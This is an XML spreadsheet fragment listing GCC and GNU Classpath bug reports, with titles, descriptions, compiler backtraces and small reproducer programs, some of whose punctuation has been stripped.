    <t>GCC-63926</t>
  </si>
  <si>
    <t>[5 Regression] ICE in estimate_edge_growth at ipa-inline.h:300</t>
  </si>
  <si>
    <t>I see the following ICE with recent trunk (appeared in the last week or so):
gfortran  -c -fprofile-use -O3 -march=native -funroll-loops -ffast-math -ffree-form -D__GFORTRAN -D__FFTSG -D__FFTW3 -D__LIBINT -D__HAS_smm_dnn  -D__COMPILE_ARCH=\gfortran-test28\ -D__COMPILE_DATE=\Tue Nov 18 03:15:49 CET 2014\ -D__COMPILE_HOST=\nanosim-s01.ethz.ch\ -D__COMPILE_REVISION=\12221\ -D__SHORT_FILE__=\xc_xpbe_hole_t_c_lr.F\ /data/vjoost/gnu/cp2k/cp2k/makefiles/../src/xc_xpbe_hole_t_c_lr.F
/data/vjoost/gnu/cp2k/cp2k/makefiles/../src/xc_xpbe_hole_t_c_lr.F:108:0:
   END SUBROUTINE xpbe_hole_t_c_lr_lda_info
 ^
internal compiler error: in estimate_edge_growth at ipa-inline.h:300
0x9a813c estimate_edge_growth
	../../gcc/gcc/ipa-inline.h:299
0x9a813c estimate_edge_growth
	../../gcc/gcc/ipa-inline-analysis.c:3854
0x9a813c do_estimate_growth_1
	../../gcc/gcc/ipa-inline-analysis.c:3867
0x76792e cgraph_node::call_for_symbol_thunks_and_aliases(bool (*)(cgraph_node* void*) void* bool)
	../../gcc/gcc/cgraph.c:2206
0x9a2779 do_estimate_growth(cgraph_node*)
	../../gcc/gcc/ipa-inline-analysis.c:3881
0x11f2f80 estimate_growth
	../../gcc/gcc/ipa-inline.h:276
0x11f2f80 inline_small_functions
	../../gcc/gcc/ipa-inline.c:1609
0x11f2f80 ipa_inline
	../../gcc/gcc/ipa-inline.c:2198
0x11f2f80 execute
	../../gcc/gcc/ipa-inline.c:2568
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
If I copy source objects mod and gcda files to different directory I run into an error: Error: source locations for function â€˜__xc_xpbe_hole_t_c_lr_MOD_xpbe_hole_t_c_lr_lda_infoâ€™ have changed the profile data may be out of date [-Werror=coverage-mismatch]. Is there an option to allow for this (-Wno-error=coverage-mismatch results in no ICE)?</t>
  </si>
  <si>
    <t>GCC-4875</t>
  </si>
  <si>
    <t>Optimiser produces incorrect code for i386 platforms</t>
  </si>
  <si>
    <t>When running the attached program compiled with
any optimisation level greater than 0 the results
are incorrect. Hexadecimal output of the variable s
suggests that an incorrect sign extension is performed.
I.e. the 32 high bits of s are set to 1 when assigning a
positive long or long long literal to a long long variable.
The behaviour has been verified with gcc 3.0.2 on 
PC/WinNT with DJGPP and on Linux.
Both show the incorrect results.
I don't have any detailed information on the two
Linux systems used to verify the problem because I didn't
run the tests there myself. I only know that one was a 
SUSE and the other a Redhat distribution.
gcc v3.0.2 on Solaris v2.6 doesn't show this error.
Release:
gcc v3.0.2
Environment:
gcc v3.0.2
Exactly the same behaviour using DJGPP
and Linux version.
How-To-Repeat:
gcc -Wall o.c
gcc -Wall -O2 o.c
Run both executables and compare output.</t>
  </si>
  <si>
    <t>ahelm</t>
  </si>
  <si>
    <t>GCC-16089</t>
  </si>
  <si>
    <t>[4.0 regression] unwind-dw2.c:1311: error: insn outside basic block</t>
  </si>
  <si>
    <t>In stage1 the following errors occur:
./xgcc -B./ -B/home/dave/opt/gnu/gcc/gcc-3.5.0/hppa-linux/bin/ -isystem /home/da
ve/opt/gnu/gcc/gcc-3.5.0/hppa-linux/include -isystem /home/dave/opt/gnu/gcc/gcc-
3.5.0/hppa-linux/sys-include -L/home/dave/gnu/gcc-3.5/objdir/gcc/../ld -O2  -DIN
_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-
style-definition  -isystem ./include  -fPIC -DELF=1 -DLINUX=1 -g -DHAVE_GTHR_DEF
AULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I../../gcc/
gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I../../gcc/g
cc/../libbanshee/libcompat -I../../gcc/gcc/../libbanshee -I../../gcc/gcc/../libb
anshee/points-to  -fexceptions -c ../../gcc/gcc/unwind-dw2.c -o libgcc/./unwind-
dw2.o
../../gcc/gcc/unwind-dw2.c: In function `uw_init_context_1':
../../gcc/gcc/unwind-dw2.c:1311: error: insn outside basic block
(insn 473 1 10 (set (reg:SI 107)
        (reg:SI 2 %r2)) -1 (nil)
    (nil))
../../gcc/gcc/unwind-dw2.c:1311: internal compiler error: in rtl_verify_flow_inf
o at cfgrtl.c:2223
My last successful build was updated at Sat Jun 19 00:04:42 UTC 2004.</t>
  </si>
  <si>
    <t>GCC-17306</t>
  </si>
  <si>
    <t>function_vector attribute in H8300H/H8S</t>
  </si>
  <si>
    <t>Hi
As per the document at 
http://gcc.gnu.org/onlinedocs/gcc-3.4.1/gcc/Function-Attributes.html#Function%
20Attributes 
callling a function with function_vector attribute for H8300H 
H8S targets should use lesser number of bytes than normal call. That means it
should be using memory indirect call using jsr @@aa:8 instruction. But 
following test 
case doesn't generate such instruction.
Commandline: h8300-elf-gcc test.c -mh -S
/* test.c */
void foo (void) __attribute__ ((function_vector))
void foo (void)
{
}
void bar (void)
{
    foo()
}
Folowing is assembly listing.
    .h8300h
    .section .text
    .align 1
    .global _foo
_foo:
    mov.l   er6@-er7
    mov.l   er7er6
    mov.l   @er7+er6
    rts
    .size   _foo .-_foo
    .align 1
    .global _bar
_bar:
    mov.l   er6@-er7
    mov.l   er7er6
    jsr @_foo ----&gt; should be jsr @@aa:8
    mov.l   @er7+er6
    rts
    .size   _bar .-_bar
    .end
Regards
Asgari Jinia
KPIT Cummins InfoSystems Ltd.
Pune India
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free download of GNU based tool-chains for Renesas' SH and H8 Series.
The following site also offers free technical support to its users. 
Visit http://www.kpitgnutools.com for details. 
Latest versions of KPIT GNU tools are released on June 1 2004.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</t>
  </si>
  <si>
    <t>asgarij</t>
  </si>
  <si>
    <t>GCC-4325</t>
  </si>
  <si>
    <t>hppa64-hp-hpux11.00 testsuite failures.</t>
  </si>
  <si>
    <t>After building the compiler with a 32-&gt;64 bit cross compiler and doing a 'make check' in ${TOP}/gcc the follow tests fail.
Release:
gcc-3.0.1
Environment:
gcc3 -v
Reading specs from /pkg/gcc/gcc__v3.0.1.dist/gcc/lib/gcc-lib/hppa64-hp-hpux11.00/3.0.1/specs
Configured with: ../configure --prefix=/pkg/gcc/gcc__v3.0.1.dist/gcc --enable-languages=cc++ --host=hppa64-hp-hpux11.00 --target=hppa64-hp-hpux11.00 --with-gnu-as --with-as=/pkg/binutils/binutils__v2.11.2.dist/binutils/bin/as
Thread model: single
gcc version 3.0.1</t>
  </si>
  <si>
    <t>GCC-51323</t>
  </si>
  <si>
    <t>[4.6 Regression] g++ confuses this with function argument in optimized call</t>
  </si>
  <si>
    <t>Created attachment 25921
Boiled down source code.  Bad code for last function.
The following boiled down code produces a jmp to Grob::internal_set_property where the implicit first call argument (this) is equal to the explicit second call argument instead of the actual this pointer.  The guilty code sequence is
.L4:
	movl	%ebx 40(%esp)
	movl	%ebx 32(%esp)
	movl	%eax 36(%esp)
	addl	$24 %esp
	.cfi_remember_state
	.cfi_def_cfa_offset 8
	popl	%ebx
	.cfi_def_cfa_offset 4
	.cfi_restore 3
	jmp	_ZN4Grob21internal_set_propertyEPvS0_
Version is
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-linux-gnu/4.6.1/lto-wrapper
Target: i686-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.1-9ubuntu3' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --enable-targets=all --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=i686-linux-gnu --host=i686-linux-gnu --target=i686-linux-gnu
Thread model: posix
gcc version 4.6.1 (Ubuntu/Linaro 4.6.1-9ubuntu3) 
Compilation options are -O2
This is from Lilypond source code and causes a segfault.</t>
  </si>
  <si>
    <t>dak</t>
  </si>
  <si>
    <t>GCC-26687</t>
  </si>
  <si>
    <t>gcc -O1 -fno-pic generates bad code that references uninitialized r31</t>
  </si>
  <si>
    <t>Overview Description:
  gcc 3.3 or gcc 4.0 on Apple's OSX 10.4 generates bad code that references r31 when called with -O1 -fno-pic.  If you use -O0 or do not use -fno-pic the problem.
Steps to Reproduce:
run gcc -O1 -fno-pic -c or gcc-4.0 -O1 -fno-pic -c on:
void broken(double *ret int num)
{
  ret[0] = num ? 0.1 : 0.0
}
Actual Results:
Compile this source file with gcc-4.0 -c -O1 -fno-pic.
View the object file with otool -lrtvdI -s __TEXT __literal8:
[...]
Relocation information (__TEXT__text) 8 entries
address  pcrel length extern type    scattered symbolnum/value
00000014 False long   n/a    LO16    True      0x00000030
         False long   False  PAIR    False     half = 0x0000
00000010 False long   n/a    HA16    True      0x00000030
         False long   False  PAIR    False     half = 0x0034
0000000c False long   False  LO16    False     2 (__TEXT__literal8)
         False long   False  PAIR    False     half = 0x0000
00000008 False long   False  HA16    False     2 (__TEXT__literal8)
         False long   False  PAIR    False     half = 0x0030
(__TEXT__text) section
_broken:
00000000        cmpwi   cr7r40x0
00000004        beq+    cr70x1c
00000008        lis     r20x0
0000000c        lwz     r90x30(r2)
00000010        addis   r10r310x0
00000014        lwz     r100x34(r10)
00000018        b       0x24
0000001c        li      r90x0
00000020        li      r100x0
00000024        stw     r90x0(r3)
00000028        stw     r100x4(r3)
0000002c        blr
Contents of (__TEXT__literal8) section
00000030  0x3fb99999 0x9999999a (1.0000000000000001e-01)
Observe that r31 is being used without being initialized.
Expected Results:
It should not reference r31 unless it has initialized it...
And if you compile this source file with gcc-4.0 -c -O1.
View the object file with otool -lrtvdI -s __TEXT __literal8:
[...]
Relocation information (__TEXT__text) 8 entries
address  pcrel length extern type    scattered symbolnum/value
00000024 False long   n/a    LO16DIF True   0x00000040
         False long   n/a    PAIR    True   0x00000008 other_half = 0x0000
00000020 False long   n/a    HA16DIF True   0x00000040
         False long   n/a    PAIR    True   0x00000008 other_half = 0x003c
0000001c False long   n/a    LO16DIF True   0x00000040
         False long   n/a    PAIR    True   0x00000008 other_half = 0x0000
00000018 False long   n/a    HA16DIF True   0x00000040
         False long   n/a    PAIR    True   0x00000008 other_half = 0x0038
(__TEXT__text) section
_broken:
00000000        mfspr   r0lr
00000004        bcl     20310x8
00000008        mfspr   r8lr
0000000c        mtspr   lrr0
00000010        cmpwi   cr7r40x0
00000014        beq+    cr70x2c
00000018        addis   r2r80x0
0000001c        lwz     r90x38(r2)
00000020        addis   r10r80x0
00000024        lwz     r100x3c(r10)
00000028        b       0x34
0000002c        li      r90x0
00000030        li      r100x0
00000034        stw     r90x0(r3)
00000038        stw     r100x4(r3)
0000003c        blr
Contents of (__TEXT__literal8) section
00000040  0x3fb99999 0x9999999a (1.0000000000000001e-01)
Observe that the code seems reasonable.</t>
  </si>
  <si>
    <t>bardwell</t>
  </si>
  <si>
    <t>GCC-56567</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE with lambda return type deduction and braced-init-list</t>
  </si>
  <si>
    <t>#include 
#include 
#include 
int main() {
    for ( auto &amp;&amp; s : []()
          { return { std::string( first ) std::string( second ) } }() )
        std::cout &lt;&lt; s &lt;&lt; '\n'
}
ildtice.cpp: In lambda function:
ildtice.cpp:7:61: internal compiler error: in make_decl_rtl at varasm.c:1136
  { return { std::string( first ) std::string( second ) } }() )
                                                             ^
ildtice.cpp:7:61: internal compiler error: Abort trap: 6
g++: internal compiler error: Abort trap: 6 (program cc1plus)
C++11 5.1.2/4:
â€¦
â€” if the compound-statement is of the form
{ attribute-specifier-seqopt return expression  }
â€¦
The return statement doesn't match the pattern because a braced-init-list is not an expression. Should be a proper error.</t>
  </si>
  <si>
    <t>GCC-54301</t>
  </si>
  <si>
    <t>Add optional warning if pointer assigning a local variable to a nonlocal pointer</t>
  </si>
  <si>
    <t>Suggested by ISO/IEC Project 22.24772 Guidance for Avoiding Vulnerabilities
through Language Selection and Use  (see links at
http://gcc.gnu.org/wiki/GFortranStandards)
From the Fortran appendix (draft at ftp://ftp.nag.co.uk/sc22wg5/N1901-N1950/N1929.pdf)
At the end there is the suggestion:
Fortran.58.1 Implications for Standardization
Future standardization eorts should consider:
...
* Requiring that processors have the ability to detect and report the
occurrence within a submitted program unit of pointer assignment of
a pointer whose lifetime is known to be longer than the lifetime of the
target.
I think can be diagnosed with some -W... warning in the following case: The LHS of the pointer assignment is
a) A function result variable
b) A dummy argument
c) A host- or use-associated variable
d) A common-block variable
and the RHS is a local variable (local to the procedure or local to a BLOCK) - but crucially RHS variable is not a pointer.
[At least the case (a) I have already seen in some bugreport.]</t>
  </si>
  <si>
    <t>GCC-82166</t>
  </si>
  <si>
    <t>gcc ICE at -Os on valid code on x86_64-linux-gnu in ix86_finalize_stack_frame_flags</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/home/absozero/trunk/root-gcc/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/home/absozero/trunk/root-gcc --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 8.0.0 20170909 (experimental) [trunk revision 251936] (GCC)
$ gcc-trunk -Os -m32 abc.c
abc.c:1:6: warning: conflicting types for built-in function â€˜printfâ€™ [-Wbuiltin-declaration-mismatch]
 void printf()
      ^~~~~~
during RTL pass: pro_and_epilogue
abc.c: In function â€˜mainâ€™:
abc.c:9:1: internal compiler error: in ix86_finalize_stack_frame_flags at config/i386/i386.c:14271
 }
 ^
0x7ada6c ix86_finalize_stack_frame_flags
	../../gcc/gcc/config/i386/i386.c:14271
0xfc71fb ix86_expand_epilogue(int)
	../../gcc/gcc/config/i386/i386.c:15414
0x11b7b8f gen_epilogue()
	../../gcc/gcc/config/i386/i386.md:12700
0xfaae48 target_gen_epilogue
	../../gcc/gcc/config/i386/i386.md:12211
0xae15e8 make_epilogue_seq
	../../gcc/gcc/function.c:5864
0xae16fc thread_prologue_and_epilogue_insns()
	../../gcc/gcc/function.c:5946
0xae1dc2 rest_of_handle_thread_prologue_and_epilogue
	../../gcc/gcc/function.c:6436
0xae1dc2 execute
	../../gcc/gcc/function.c:6478
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ cat abc.c
void printf()
int a b c
int main() {
  int j
  for ( c)
    a = b
  for ( j)
    printf()
}</t>
  </si>
  <si>
    <t>CLASSPATH-23887</t>
  </si>
  <si>
    <t>JProgressBar does not draw text vertically</t>
  </si>
  <si>
    <t>It draws the horizontal text fine but the vertical text is not painted at all.</t>
  </si>
  <si>
    <t>GCC-50468</t>
  </si>
  <si>
    <t>ICE in force_type_die when compiling binutils with -flto -O[12]</t>
  </si>
  <si>
    <t>Got this when building binutils-2.21.53.20110810 from source using g++-4.6.real (Ubuntu/Linaro 4.6.1-9ubuntu3) or g++-4.7.0 20110914 on Ubuntu 11.10 amd64:
g++ -W -Wall    -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -frandom-seed=ld-new -g -flto -O2  -Wl-Bsymbolic-functions -o ld-new main.o i386.o x86_64.o sparc.o powerpc.o arm.o arm-reloc-property.o libgold.a ../libiberty/libiberty.a   -ldl -lz -lm
incremental.o (symbol from plugin): warning: memset used with constant zero length parameter this could be due to transposed parameters
In member function â€˜__base_ctor â€™:
lto1: internal compiler error: in force_type_die at dwarf2out.c:21022
Interestingly changing -O2 to -O1 introduces this variation:
incremental.o (symbol from plugin): warning: memset used with constant zero length parameter this could be due to transposed parameters
In file included from ../../gold/incremental.h:5152:0
                 from :4601:
../../gold/icf.h: In member function â€˜__base_dtor â€™:
../../gold/icf.h:62:5: internal compiler error: in force_type_die at dwarf2out.c:21022</t>
  </si>
  <si>
    <t>GCC-9486</t>
  </si>
  <si>
    <t>[3.4 regression] can't find a matching member template function</t>
  </si>
  <si>
    <t>The below testcase (from boost configure tests)
fails with :
b.c: In function `void test_proc(T) [with T = int]':
b.c:33:   instantiated from here
b.c:25: error: no matching function for call to `foo::mfoo(int&amp;)'
Release:
current CVS HEAD
Environment:
Linux
How-To-Repeat:
g++ b.c</t>
  </si>
  <si>
    <t>GCC-31169</t>
  </si>
  <si>
    <t>Bootstrap comparison error at revision 122821</t>
  </si>
  <si>
    <t>make[3]: Leaving directory `/test/gnu/gcc/objdir'
Comparing stages 2 and 3
warning: ./cc1-checksum.o differs
Bootstrap comparison failure!
./build/genautomata.o differs
./pointer-set.o differs
./cfgexpand.o differs
./cfglayout.o differs
./builtins.o differs
./cfgloopanal.o differs
./cfgloopmanip.o differs
./cse.o differs
./cselib.o differs
./combine.o differs
./df-core.o differs
./df-scan.o differs
./gcse.o differs
./gimplify.o differs
./global.o differs
./graph.o differs
./jump.o differs
./lambda-mat.o differs
./langhooks.o differs
./lambda-code.o differs
./loop-invariant.o differs
./lower-subreg.o differs
./omega.o differs
./postreload.o differs
./real.o differs
./recog.o differs
./regmove.o differs
./regclass.o differs
./regrename.o differs
./reload.o differs
./reload1.o differs
./rtlanal.o differs
./see.o differs
./sched-rgn.o differs
./simplify-rtx.o differs
./stmt.o differs
./struct-equiv.o differs
./tree-complex.o differs
./tree-cfg.o differs
./tree-data-ref.o differs
./tree-eh.o differs
./tree-pretty-print.o differs
./tree-ssa-coalesce.o differs
./tree-ssa-dom.o differs
./tree-ssa-live.o differs
./tree-ssa-loop-im.o differs
./tree-ssa-loop-niter.o differs
./tree-ssa-loop-ivopts.o differs
./tree-ssa-phiopt.o differs
./tree-ssa-pre.o differs
./tree-ssa.o differs
./tree-vect-analyze.o differs
./tree-vectorizer.o differs
./tree-vect-transform.o differs
./cgraphunit.o differs
./gccspec.o differs
./gcc.o differs
./c-decl.o differs
./final.o differs
./modulo-sched.o differs
./passes.o differs
./ipa-inline.o differs
./gcov.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/test/gnu/gcc/objdir'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/test/gnu/gcc/objdir'
-bash-2.05b$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --disable-nls --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.3.0 --enable-debug=no --enable-threads=posix --with-mpfr=/opt/gnu/gcc/gcc-4.3.0 --with-gmp=/opt/gnu/gcc/gcc-4.3.0 --disable-libmudflap --enable-languages=c
Thread model: posix
gcc version 4.3.0 20070311 (experimental)</t>
  </si>
  <si>
    <t>GCC-71528</t>
  </si>
  <si>
    <t>[5 Regression] multiple extern reference declarations produce uninitialized access</t>
  </si>
  <si>
    <t>This is a regression since 5.1 which works with clang and gcc 4.x
The issue is due to the redundant extern reference declaration
which results in use of an unitialized reference. I.E. in this snippet
x will have the NULL pointer rather than that of the new int:
extern int
int
int main() { return !( }
// Comment out the following line for expected operation
extern int
https://godbolt.org/g/dDDPnw</t>
  </si>
  <si>
    <t>P</t>
  </si>
  <si>
    <t>GCC-48211</t>
  </si>
  <si>
    <t>[4.7 Regression] [C++0x] Segment Fault When Compiling</t>
  </si>
  <si>
    <t>Created attachment 23729
source file and temp file.
Source file that leads to crash is in attachment named as function.cpp along with temp files function. ii and function.s
The following is what I did to compile the source and the output by the compiler.
$ gcc -std=c++0x function.cpp
In file included from /usr/local/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0/memory:85:0
                 from function.cpp:2:
/usr/local/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0/bits/unique_ptr.h: In instantiation of â€˜constexpr std::unique_ptr::unique_ptr() [with _Tp = const stmt_base _Dp = std::default_delete]â€™:
function.cpp:8:8:   instantiated from â€˜sptrâ€™
function.cpp:28:33:   instantiated from here
/usr/local/lib/gcc/i686-pc-cygwin/4.7.0/../../../../include/c++/4.7.0/bits/unique_ptr.h:115:59: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The following is compiler and system info.
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/i686-pc-cygwin/4.7.0/lto-wrapper.exe
Target: i686-pc-cygwin
Configured with: ./configure --enable-languages=cc++fortranltoobjc
Thread model: single
gcc version 4.7.0 20110320 (experimental) (GCC)</t>
  </si>
  <si>
    <t>lene13</t>
  </si>
  <si>
    <t>GCC-7674</t>
  </si>
  <si>
    <t>unjustified syntax error when a class contains a reference AND a pointer to member</t>
  </si>
  <si>
    <t>The code attached compiled with g++ bug.C gives:
bug.C: In function `int main()':
bug.C:23: uninitialized const member `components::m_g'
Release:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs Configured with: /usr/local/src/gcc-3.2/configure --enable-languages=cc++ Thread model: posix gcc version 3.2
Environment:
Linux i686 kernel 2.4.5
How-To-Repeat:
g++ bug.C
Where bug.C contains:
class hgraph_base {
  public:
  int foo
}
class Hnode
class components {
  hgraph_base
  int Hnode::* m_node_nr
public:
  inline components(hgraph_base&amp; pg) : m_g (pg) {
  }
}
int main () {
  hgraph_base base
  components bi(base)
  return 0
}</t>
  </si>
  <si>
    <t>ulrich.lauther</t>
  </si>
  <si>
    <t>GCC-82682</t>
  </si>
  <si>
    <t>[8 Regression] FAIL: gcc.target/i386/pr50038.c scan-assembler-times movzbl 2 (found 3 times) since r253958</t>
  </si>
  <si>
    <t>Starting with this revision on i686-linux (or x86_64-linux with -m32) there are 3 movzbls instead of 2.  Are the cost changes correct?  If they are shall we adjust the testcase?</t>
  </si>
  <si>
    <t>GCC-4958</t>
  </si>
  <si>
    <t>Internal compiler error #122 in finish_function</t>
  </si>
  <si>
    <t>The executive summary:
Internal error #122.
Internal compiler error in finish_function at ../gcc/cp/decl.c:14422
Release:
2.96
Environment:
RH 7.0 on P200
How-To-Repeat:
Ahem.. this is the story: I got this a while ago and just
piped it to a file. Now I can't remember why it occured 
or what I was doing (the hack it refers to is edited beyond
recognition and the function in which it occured does no 
longer exist).  Therefore I don't know and therefore this 
bugreport blows.
If this is something serious I can try to restore the
file I was working on to figure out what caused it. But I
won't bother until someone asks me.</t>
  </si>
  <si>
    <t>elliot_nash_</t>
  </si>
  <si>
    <t>GCC-1251</t>
  </si>
  <si>
    <t>libgcj build fails when -O2 is used</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;closed
State-Changed-Why: This problem is fixed by the following patch:
    http://gcc.gnu.org/ml/gcc-patches/2000-05/msg01303.html
    Which has been checked into cvs.
</t>
  </si>
  <si>
    <t>fegray</t>
  </si>
  <si>
    <t>GCC-43770</t>
  </si>
  <si>
    <t>GNU Fortran is not working</t>
  </si>
  <si>
    <t>checking dynamic linker characteristics... (cached) GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether the GNU Fortran compiler is working... no
configure: error: GNU Fortran is not working please report a bug in http://gcc.gnu.org/bugzilla attaching /data2/share/gcc/gcc-4.4.3/x86_64-unknown-linux-gnu/libgfortran/config.log
make[1]: *** [configure-target-libgfortran] Error 1
make[1]: Leaving directory `/data2/share/gcc/gcc-4.4.3'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>wang-xi05</t>
  </si>
  <si>
    <t>GCC-39518</t>
  </si>
  <si>
    <t>Missing documentation of cygwin and mingw target options</t>
  </si>
  <si>
    <t>In gcc/doc/invoke.texi all the cygwin/mingw specific target -m options aren't documented.</t>
  </si>
  <si>
    <t>GCC-10609</t>
  </si>
  <si>
    <t>--enable-debug: different meanings for libstdc++v3 and libffi</t>
  </si>
  <si>
    <t xml:space="preserve">	
[choosing category libgcj instead of missing libffi]
Configuring with --enable-debug which is supposed to build an additional
debug library for libstdc++v3 libffi is configured for debug mode as well.
libffi does not build an addition debug library but encodes debugging
into the standard library (FFI_DEBUG/FFI_ASSERT).
Release:
3.3 20030429 (Debian prerelease) (Debian testing/unstable)
Environment:
System: Linux tango 2.4.20-xfs #1 Thu Dec 19 01:48:10 CET 2002 i686 unknown unknown GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77objcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>GCC-67124</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux-gnu at -O1 -O2 and -O3 in the 64-bit mode (but not in the 32-bit mode). 
This is a regression from 5.1.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150804 (experimental) [trunk revision 226592] (GCC) 
$ 
$ gcc-trunk -O0 small.c ./a.out
$ gcc-5.1 -O1 small.c ./a.out
$ 
$ gcc-trunk -O1 small.c
$ ./a.out
Aborted (core dumped)
$ 
--------------------------------------------------
struct S1
{
  int:11
  char f1
  short f2
  int f3
  int f4
} a[2] = {{0 0 0 0} {1 0 1 0}} *b = 
int
main ()
{
  struct S1 c = a[1]
  c.f2 = 0
  *b = c
  for ()
    if (c.f1)
      break
  if (a[0].f3 != 1) 
    __builtin_abort () 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-587</t>
  </si>
  <si>
    <t>incorrect making romb-hierarchy in c++</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
gcc version 2.95.2 19991024 (release)
Environment:
i686 
kernel 2.2.17 
Linux Slackware 7.1
How-To-Repeat:
#include 
class A
{
public:
    int x
}
class B: public A
{
}
class C: public A
{
}
class D: public B public C
{
}
void main()
{
    D obj
    ((B)obj).x=1
    cout &lt;&lt; ((B)obj).x // prints not 1
}</t>
  </si>
  <si>
    <t>tomcat</t>
  </si>
  <si>
    <t>GCC-67839</t>
  </si>
  <si>
    <t>Bit addressable instructions generated for invalid memory address</t>
  </si>
  <si>
    <t>Bit addressable instructions (sbi cbi sbis sbic) only work on IO addresses 0x0-0x1f (inclusive). The compiler generates these instructions for IO address 0x20 as well.
The problem is in the specification of low_io_address_operand predicate which has
(define_special_predicate low_io_address_operand                                                                     
  (ior (and (match_code const_int)
      (match_test IN_RANGE (INTVAL (op) - avr_arch-&gt;sfr_offset
           0 0x20 - GET_MODE_SIZE (mode))))
       (and (match_code symbol_ref)
      (match_test SYMBOL_REF_FLAGS (op) &amp; SYMBOL_FLAG_IO_LOW))))
While this looks ok gcc invokes low_io_address_operand with mode set to VOID and GET_MODE_SIZE for VOID returns 0 so the effective range becomes 0x0-0x20.
gcc does pass the correct mode if the operand mode is set in the define_insn that uses this predicate. Don't know why it isn't set and why define_special_predicate is used instead of define_predicate.
Note that io_address_operand predicate has a GET_MODE_SIZE call as well so the range check is off by one in it too</t>
  </si>
  <si>
    <t>senthil_kumar.selvaraj</t>
  </si>
  <si>
    <t>GCC-80031</t>
  </si>
  <si>
    <t>gcno files contain BB flags that are not used</t>
  </si>
  <si>
    <t>It's probably quite old regression where we unnecessarily emit block flags:
profile.c:
      /* Basic block flags */
      offset = gcov_write_tag (GCOV_TAG_BLOCKS)
      for (i = 0 i != (unsigned) (n_basic_blocks_for_fn (cfun)) i++)
	gcov_write_unsigned (0)
      gcov_write_length (offset)</t>
  </si>
  <si>
    <t>GCC-79168</t>
  </si>
  <si>
    <t>[7 Regression] libtsan fails to link when cross compiling GCC tip for Aarch64 target</t>
  </si>
  <si>
    <t>GCC tip has failed to successfully compile now since our last successful nightly build on January 9 2017.
The error is the following:
.libs/tsan_rtl_aarch64.o: In function `InitializeGuardPtr()':
/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libsanitizer/tsan/../../../../libsanitizer/tsan/tsan_rtl_aarch64.S:49:(.text+0x34): relocation truncated to fit: R_AARCH64_LDST64_ABS_LO12_NC against `.text'
.libs/tsan_rtl_aarch64.o: In function `setjmp':
/tmp/tmp.d1V9p3OGZO.cbatch02777/build-aarch64-sarc-linux-gnu/aarch64-sarc-linux-gnu/libsanitizer/tsan/../../../../libsanitizer/tsan/tsan_rtl_aarch64.S:81:(.text+0x54): relocation truncated to fit: R_AARCH64_LDST64_ABS_LO12_NC against `.text'
